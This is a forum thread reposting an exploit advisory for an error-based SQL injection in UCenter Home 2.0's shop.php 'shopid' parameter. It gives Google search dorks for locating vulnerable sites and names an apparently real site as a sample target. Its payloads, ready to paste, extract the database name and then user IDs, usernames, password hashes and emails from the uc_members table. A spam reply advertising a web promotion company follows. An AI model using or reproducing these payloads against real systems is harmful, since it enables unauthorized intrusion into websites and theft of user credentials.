Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[BUG] UCenter Home 2.0 SQL Injection Vulnerability

[复制链接]
cntear 发表于 2010-9-15 12:18:01 | 显示全部楼层 |阅读模式
作者: KnocKout
邮箱: knockoutr@msn.com
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
漏洞程序: UCenter Home
版本 : 2.0
官方网站 : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
GOOGLEHACK1 : Powered by UCenter inurl:shop.php?ac=view
GOOGLEHACK2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
漏洞文件: Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Metarials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Your Need victim Database name.
for Inject : http://www.chnlanker.com/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
DB : Okey.
your edit DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
使用十六进制转变SQL注入值

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
秦竹 发表于 2010-9-25 15:17:27 | 显示全部楼层
太原推广网站公司www.13453136406.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-17 00:07 , Processed in 0.024406 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表